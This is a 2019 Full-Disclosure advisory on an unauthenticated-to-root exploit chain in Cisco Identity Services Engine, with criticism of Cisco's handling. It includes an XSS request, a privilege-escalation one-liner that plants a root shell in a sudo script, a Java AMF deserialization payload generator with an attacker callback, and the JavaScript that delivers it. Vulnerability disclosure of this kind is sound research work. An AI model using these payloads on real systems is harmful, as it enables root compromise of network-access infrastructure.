lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1f99c100-853f-0ae6-c4d8-9cde876ce5bd@gmail.com>
Date: Tue, 5 Feb 2019 10:18:19 +0700
From: Pedro Ribeiro <pedrib@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
 bugtraq@...urityfocus.com
Subject: [FD] [Multiple CVE] - Cisco Identity Services Engine unauth stored
 XSS to RCE as root

Hi,

On January 20th, SSD disclosed 3 vulnerabilities found by Agile
Information Security in their Cisco Identity Services Engine (ISE) product.

These are unauth stored XSS, unsafe Java deserialization and privesc to
root, which when combined allow an unauthenticated attacker to achieve
remote code execution as root - as long as you can get an admin to visit
the ISE page vulnerable to stored XSS. This is my take on it.

Cisco has been incredibly negligent throughout this whole affair:
- they did not assign CVE numbers to java deserialization and the
privesc, making it impossible to track them
- it is not clear what / if any versions are fixed from their security
bulletins
- they still recommend version 2.4.0.357 as the suggested release in the
downloads section of their website; this is the version we tested and
found vulnerable to everything described below
- the java deserialization and privesc vulnerabilities were
independently found by other researchers and reported around the same
time, but Cisco refused to give Agile Information Security any credit

In summary, this is a total mess. It is pretty evident that Cisco does
not care about security or keeping their customers informed, they just
like to sweep security issues under the rug. Good luck doing that with a
public exploit.

We would like to thank Beyond Security's SSD Disclosure programme for
helping us deal with Cisco and avoid even more headaches. Their advisory
can be found at https://ssd-disclosure.com/index.php/archives/3778 and a
copy of the text below can be found in my repo at
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ise-rce.txt.

Get the exploit from SSD's post or from
https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb

==============
>> Multiple vulnerabilities in Cisco Identity Services Engine
(unauthenticated stored XSS to RCE as root)
>> Discovered by Pedro Ribeiro (pedrib@...il.com), Agile Information
Security and Dominik Czarnota (dominik.b.czarnota@...il.com)
=================================================================================
Disclosure: 20/01/2019 / Last updated: 05/02/2019


>> Background and product information
>From the vendor's website [1]:
The Cisco Identity Services Engine (ISE) is your one-stop solution to
streamline security policy management and reduce operating costs. With
ISE, you can see users and devices controlling access across wired,
wireless, and VPN connections to the corporate network.

Cisco ISE allows you to provide highly secure network access to users
and devices. It helps you gain visibility into what is happening in your
network, such as who is connected, which applications are installed and
running, and much more. It also shares vital contextual data, such as
user and device identities, threats, and vulnerabilities with integrated
solutions from Cisco technology partners, so you can identify, contain,
and remediate threats faster."


>> Summary
ISE is distributed by Cisco as a virtual appliance. We have analysed
version 2.4.0.357 and found three vulnerabilities: an unauthenticated
stored cross site scripting, a authenticated Java deserialization
vulnerability leading to remote code execution as an unprivileged user,
and a privilege escalation from that unprivileged user to root.

By putting them all together, we can achieve remote code execution as
root, provided we can trap an administrator into visiting the ISE page
vulnerable to the stored cross site scripting. A Ruby exploit that
implements this full exploit chain (described in more detail at
'Exploitation summary', at the end of this file) is available in [2].

All the vulnerabilities in this advisory were found independently by
Agile Information Security. However, vulnerability #2 (Unsafe Flex AMF
Java Object Deserialization) was also found and reported to Cisco by
Olivier Arteau of Groupe Technologie Desjardins [3] and vulnerability #3
(Privilege Escalation via Incorrect sudo File Permissions) was also
found and reported to Cisco by Hector Cuesta [4].

Cisco refused to credit Agile Information Security with finding
vulnerabilities #2 and #3, and also refused to provide a CVE for both
these vulnerabilities, saying regarding #3 that "This issue has been
evaluated as a hardening effort to improve the security posture of the
device. According with our Security vulnerability policy, we request do
not request a CVE assignment for issue with a Severity Impact Rating
(SIR) lower than Medium. This issue will be fixed in the upcoming ISE
release".
At the time of the latest update, Cisco still recommends version
2.4.0.357 - affected by all the vulnerabilities in this advisory - as
the "Suggested Release" in their software download page.

These actions show Cisco is incredibly negligent with regards to the
security of their customers. They are still shipping (and recommending)
a product version vulnerable to unauthenticated remote code execution,
with a fully working public exploit and no way to track fixes or fixed
versions for these vulnerabilities.

Agile Information Security would like to thank Beyond Security's SSD
Secure Disclosure programme for helping us disclose these
vulnerabilities to Cisco, and publishing the advisory on their site [5].


>> Technical details:
#1
Vulnerability: Stored Cross Site Scripting
CVE-2018-15440
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on ISE virtual appliance v2.4.0.357

The LiveLogSettingsServlet, available at /admin/LiveLogSettingsServlet,
contains a stored cross site scripting vulnerability.
The doGet() HTTP request handler takes in an Action parameter as a HTTP
query variable, which can be "read" or "write".
With the "write" parameter, it calls the writeLiveLogSettings() function
which then takes several query string variables, such as Columns, Rows,
Refresh_rate and Time_period.
The content of these query string variables is then written to
/opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt, and the server responds
with a 200 OK. These parameters are not validated, and can contain any text.

When the Action parameter equals "read", the servlet will read the
/opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt file and display it back to
the user with the Content-Type "text/html", causing whatever was written
to that file to be rendered and executed by the browser.

To mount a simple attack, we can send the following request:
GET
/admin/LiveLogSettingsServlet?Action=write&Columns=1&Rows=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e&Refresh_rate=1337&Time_period=1337

Which can then be triggered with:
GET /admin/LiveLogSettingsServlet?Action=read HTTP/1.1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 164
Server:

<Settings>
<Columns>
<Col>1</Col>
</Columns>
<Rows><script>alert(1)</script></Rows>
<Refresh_rate>1337</Refresh_rate>
<Time_period>1337</Time_period>
</Settings>

This vulnerability can be exploited by an unauthenticated attacker.


#2
Vulnerability: Unsafe Flex AMF Java Object Deserialization
CVE-2017-5641; Please be aware this CVE is not specific to Cisco ISE
Attack Vector: Remote
Constraints: Requires authentication to the admin web interface
Affected versions: confirmed on ISE virtual appliance v2.4.0.357

By sending an HTTP POST request with random data to
/admin/messagebroker/amfsecure, the server will respond with a 200 OK
and binary data that includes:
 ...Unsupported AMF version XXXXX...

Which indicates that the server has a Apache / Adobe Flex AMF (BlazeDS)
endpoint at that location. The BlazeDS library version running on the
server is 4.0.0.14931, which means it is vulnerable to CVE-2017-5641
[6], the description of which is stated below:
"Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not
restrict which types were allowed for AMF(X) object deserialization by
default. During the deserialization process code is executed that for
several known types has undesired side-effects. Other, unknown types may
also exhibit such behaviors. One vector in the Java standard library
exists that allows an attacker to trigger possibly further exploitable
Java deserialization of untrusted data. Other known vectors in third
party libraries can be used to trigger remote code execution."

This vulnerability was previously exploited in DrayTek VigorACS by Agile
Information Security, as it can be seen in [7] and [8]. Please refer to
that advisory and exploit, as well as [9], [10] and [11] for further
details on this vulnerability.

We were able to re-use some of the exploit code in [7] from the VigorACS
vulnerability to create a binary AMF payload that will execute on the
server as the iseadminportal user (see Appendix A).

The the exploit chain works in the same way as the previous one:
a) sends an AMF binary payload to /admin/messagebroker/amfsecure as
described in [10] to trigger a Java Remote Method Protocol (JRMP) call
back to the attacker
b) receives the JRMP connection with ysoserial's JRMP listener [12]
c) calls ysoserial with the ROME payload, as a vulnerable version of
Rome (1.0 RC2) is in the Java classpath of the server
d) execute ncat (the binary is on the ISE virtual appliance) and return
a reverse shell running as the iseaminportal user

Appendix A contains the Java code used to generate the AMF payload that
will be sent in step a). This code is very similar to the one in [10],
and it is highly recommended to read that advisory by Markus Wulftange
of Code White for a better understanding of this vulnerability.

This vulnerability can only be exploited by an authenticated attacker
with access to the administrative portal.


#3
Vulnerability: Privilege Escalation via Incorrect sudo File Permissions
No CVE assigned; track as SSD-3778
Attack Vector: Local
Constraints: Requires a command shell running as the iseadminportal user
Affected versions: confirmed on ISE virtual appliance v2.4.0.357

The iseadminportal user can run a variety of commands as root via sudo
(output of 'sudo -l'):
    (root) NOPASSWD: /opt/CSCOcpm/bin/resetMntDb.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/resetMnTSessDir.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/setdbpw.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/sync_export.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/sync_import.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_export.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_import.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_cleanup.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/ttcontrol.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/updatewallet.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/log-list.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/file-info.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/delete-log-file.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/debug-log-config.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/showinv.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/isebackupcancel.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/nssutils.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/killsubnetscan.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/thirdpartyguestvlan.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/ise-3rdpty-guestvlan.sh *
    (root) NOPASSWD: /opt/CSCOcpm/mnt/bin/CheckDiskSpace.sh *
    (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/genbackup.sh *
    (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/createHCTOnPAPScript.sh *
    (root) NOPASSWD:
/opt/CSCOcpm/upgrade/bin/backupHostConfigTablesOnPAP.sh *
    (root) NOPASSWD:
/opt/CSCOcpm/upgrade/bin/dictionary_attribute_update.sh *
    (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/deleteguest.sh *
    (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/iseupgrade-dbexport.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_backup.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_restore.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_sync.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/pbis_monit.sh *
    (root) NOPASSWD: /opt/CSCOcpm/prrt/bin/FIPS_lockdown.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/iseupgradeui.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/show_iowait.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/kerberosprobe.sh *
    (root) NOPASSWD: /opt/CSCOcpm/bin/sxp-servercontrol.sh *
...

However all of the files above are writeable by the iseadminportal user.
This makes it trivial to perform privilege escalation to root. All that
is needed to do is to edit the files, and add a "/bin/sh" to the second
and / or last line, then run the script as sudo to get a root shell.


>> Exploitation summary:
By now you should have a decent idea of how to build a full exploit
chain. Since vulnerability #2 (AMF RCE) can only be exploited by an
authenticated administrator, we can set up a trap using vulnerability #1
(stored XSS) as an unauthenticated attacker.

By abusing the stored cross site scripting, we can create a malicious
Javascript (see Appendix B) that will be stored in
/admin/LiveLogSettingsServlet. If a logged in user visits that page the
Javascript payload will send a XMLHttpRequest to
/admin/messagebroker/amfsecure with the payload created by the Java code
in Appendix A, and start the exploit described in vulnerability #2 (AMF
RCE) to obtain a reverse shell as the iseadminuser.

Once we have the reverse shell, we can run the following command to
abuse vulnerability #3 (privilege escalation):
python -c 'import os;f=open("/opt/CSCOcpm/bin/file-info.sh", "a+",
0);f.write("if [ \"$1\" == 1337
];then\n/bin/bash\nfi\n");f.close();os.system("sudo
/opt/CSCOcpm/bin/file-info.sh 1337")'

This will add an "if" clause at the end of /opt/CSCOcpm/bin/file-info.sh
that looks for the "1337" parameter, and executes /bin/bash as root when
it sees it. That way we won't mess with any important system
functionality that might use that file, and we will get our full root shell.

The full exploit, written in Ruby, is available in [2].


>> Fix:
Cisco claims vulnerability #1 is fixed in version 2.2.0.913. It is
unknown if it is fixed in versions 2.4.x (see [13], [14]).
Cisco claims vulnerability #2 is fixed in version 2.4.0.905 (see [3]).
By Cisco's own admission, vulnerability #3 is not fixed at the time of
the latest update to this advisory (see [4]).

Please note that Agile Information Security does not verify any fixes,
except when noted in the advisory or requested by the vendor. The vendor
fixes might be ineffective or incomplete, and it is the vendor's
responsibility to ensure the vulnerablities found by Agile Information
Security are resolved properly.


>> Appendix A (AMF payload generator in Java):
===
import flex.messaging.io.amf.MessageBody;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.AmfMessageSerializer;
import java.io.*;

public class ACSFlex {
    public static void main(String[] args) {
        Object unicastRef = generateUnicastRef(args[0],
Integer.parseInt(args[1]));
        // serialize object to AMF message
        try {
            byte[] amf = new byte[0];
            amf = serialize((unicastRef));
            DataOutputStream os = new DataOutputStream(new
FileOutputStream(args[2]));
            os.write(amf);
            System.out.println("Done, payload written to " + args[2]);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static Object generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new
sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new
sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    public static byte[] serialize(Object data) throws IOException {
        MessageBody body = new MessageBody();
        body.setData(data);

        ActionMessage message = new ActionMessage();
        message.addBody(body);

        ByteArrayOutputStream out = new ByteArrayOutputStream();

        AmfMessageSerializer serializer = new AmfMessageSerializer();

serializer.initialize(SerializationContext.getSerializationContext(),
out, null);
        serializer.writeMessage(message);

        return out.toByteArray();
    }
}
===


>> Appendix B (Javascript code to be used in the stored XSS):
===
<script>
function b64toBlob(b64Data, contentType, sliceSize) {
  contentType = contentType || '';
  sliceSize = sliceSize || 512;
  var byteCharacters = atob(b64Data);
  var byteArrays = [];
  for (var offset = 0; offset < byteCharacters.length; offset +=
sliceSize) {
    var slice = byteCharacters.slice(offset, offset + sliceSize);
    var byteNumbers = new Array(slice.length);
    for (var i = 0; i < slice.length; i++) {
      byteNumbers[i] = slice.charCodeAt(i);
    }
    var byteArray = new Uint8Array(byteNumbers);
    byteArrays.push(byteArray);
  }
  var blob = new Blob(byteArrays, {type: contentType});
  return blob;
}
b64_payload = 'cGlzc2FuZXNzZWN1';
var xhr = new XMLHttpRequest();
xhr.open("POST", 'https://10.10.10.44/admin/messagebroker/amfsecure', true);
xhr.send(b64toBlob(b64_payload, 'application/x-amf'));
</script>
===


>> References:
[1]
https://www.cisco.com/c/en/us/products/collateral/security/identity-services-engine/data_sheet_c78-656174.html
[2] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb
[3] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvj62599
[4] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCve49987
[5] https://ssd-disclosure.com/index.php/archives/3778
[6] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5641
[7] https://github.com/pedrib/PoC/tree/master/exploits/acsPwn
[8]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/draytek-vigor-acs.txt
[9] https://issues.apache.org/jira/browse/FLEX-35290
[10] http://codewhitesec.blogspot.ru/2017/04/amf.html
[11] https://github.com/mbechler/marshalsec
[12] https://github.com/frohoff/ysoserial
[13] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm79609
[14]
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business.

---
Pedro Ribeiro
Vulnerability and Reverse Engineer / Cyber Security Specialist

pedrib@...il.com
PGP: 4CE8 5A3D 133D 78BB BC03 671C 3C39 4966 870E 966C

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ